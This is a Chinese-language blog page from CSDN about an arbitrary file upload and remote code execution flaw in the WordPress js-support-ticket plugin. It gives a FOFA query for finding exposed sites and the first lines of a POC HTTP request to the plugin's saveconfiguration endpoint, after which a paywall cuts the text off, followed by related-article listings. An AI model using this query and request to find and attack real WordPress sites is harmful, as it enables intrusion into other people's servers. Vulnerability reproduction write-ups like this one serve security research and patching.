wordpress js-support-ticket文件上传漏洞(含批量验证poc)

已于 2024-04-02 14:24:41 修改
阅读量264 收藏
点赞数 5
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-02 14:24:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137269087
版权

简介

WordPress js-support-ticket存在一个严重的安全漏洞,攻击者可以在安装了js-support-ticket的任何WordPress网站上任意上传文件并远程代码执行。

漏洞描述

WordPress js-support-ticket插件saveconfiguration功能文件上传漏洞

Fofa语法与漏洞编号

FOFA:

body="wp-content/plugins/js-support-ticket"

影响资产数量:2,668
 


CNVD漏洞编号:无

影响版本

WordPress js-support-ticket

漏洞复现

POC

POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0 

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Con
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
WordPress JS Support Ticket插件 RCE漏洞复现
0xSec
04-11 510
WordPress中的JS Support Ticket插件存在未经上漏洞,未经身份验证的攻击者可以上恶意脚本的服务器,执行任意指令,从而获取服务器权限。
Wordpress js-support-ticket文件漏洞
qq_39894062的博客
04-02 571
Wordpress js-support-ticket文件漏洞
漏洞分析】WordPress任意文件漏洞
weixin_30456039的博客
08-10 573
影响版本: WordPress <= 2.8.5漏洞描述: BUGTRAQ ID: 37005 WordPress是一款免费的论坛Blog系统。 WordPress中负责上文件的代码如下: wp-admin/includes/file.php: ---[cut]--- line 217: function wp_handle_upload( &$file, $overri...
域渗透PTT票据递攻击(Pass the Ticket)
Longwaer
01-21 1754
通过笔记全方位讲解,加速学习了解PTT票据递攻击的方法及原理,更好的去掌握黄金、白银票据生成。
F5设备中存在一个Ticketbleed漏洞,可被远程攻击者利用
weixin_34245169的博客
09-25 510
本文讲的是F5设备中存在一个Ticketbleed漏洞,可被远程攻击者利用, F5 Networks BIG-IP设备中存在一个严重漏洞漏洞编号为CVE-2016-9244。该漏洞被命名为Ticketbleed,可被远程攻击者利用于窃取内存中的敏感信息,包括敏感数据(比如SSL Session ID)。 受影响的F5 BIG-IP设备包括LTM、AA...
wordpress js-support-ticket文件漏洞
qq_39894062的博客
04-28 532
请勿利用文章内的相关技术从事非法测试,由于播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
WordPress Plugin - WPdiscuz 7.0.4 任意文件漏洞poc,python脚本,复现所需软件安装
01-01
WordPress Plugin - WPdiscuz 7.0.4 任意文件漏洞poc,python脚本,复现所需软件安装包wordpress-5.4.1-zh_CN.tar.gz,phpStudy_64_v8.1.1.3.zip,phpStudy-1_v8.1.0.3.zip,wpdiscuz.7.0.4-1670423032410.zip
Huawei Auth-Http Server 1.0 passwd文件泄露漏洞POC
07-05
-u 指定单个url -l 指定url文件 先用fofa脚本爬取所有Huawei Auth-Http相关资产(fofa脚本下载地址:) python3 fofa-cwillchris.py -k body="umweb/u20.png" 然后用此脚本 ./poc.bin -l url.txt
基于拓扑漏洞分析的网络安全态势感知模型
attack2001的专栏
06-07 910
漏洞态势分析是指通过获取网络系统中的漏洞信息、拓扑信息、攻击信息等,分析网络资产可能遭受的安全威胁以及预测攻击者利用漏洞可能发动的攻击,构建拓扑漏洞图,展示网络中可能存在的薄弱环节,以此来评估网络安全状态。在网络安全形势日益恶化的今天,如何快速有效地获取网络系统的安全状况、提高网络安全应对水平、增大网络安全的预警时间,成为网络空间安全领域研究的重要问题。网络漏洞态势感知研究存在的问题是缺乏有效的网络漏洞势数据采集和要素提取方法,使得网络资产漏洞态势的理解和分析计算难以进行。
网络安全(补充)
最新发布
m0_62207482的博客
06-12 1001
虚拟专用网中可以采用隧道技术 IPSec的加密和认证过程中所使用的密钥由IKE机制来生成和分发 输模式下的AH和ESP处理后的IP头部不变,而隧道模式下的AH和ESP处理后需要新封装一个新的IP头 SSL协议可分为两层,处于下层的是SSL记录 SSL握手协议,由三种协议组合而成,包握手协议、密码规格变更协议及报警协议。其用途是在两个应用程序开始送或接收数据前,为其提供服务器和客户端间相互认证的服务,并相互协商决定双方通信使用的加密算法及加密密钥 属于第二层隧道协议的是PPTP和L2TP,第二
国内外网络安全现状分析
waitaikong_的博客
06-10 451
综上所述,无论是国内还是国际层面,网络安全都是一个复杂且不断演变的领域。面对日益严峻的网络安全威胁,需要政府、企业和个人共同努力,不断提升技术防护能力,加强法律法规建设,并通过国际合作共同应对挑战。同时,加强网络安全教育和人才培养也是保障网络安全的重要环节。在未来,随着技术的不断进步和国际合作的加深,我们有理由相信网络安全状况将会得到进一步的改善。
解决 poc-yaml-druid-monitor-unauth 漏洞
07-20
对于解决 poc-yaml-druid-monitor-unauth 漏洞,您可以采取以下步骤: 1. 更新和升级:确保您正在使用的Druid版本是最新的,并应用任何可用的安全补丁。及时更新软件可以解决已知的漏洞。 2. 访问控制:配置Druid...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值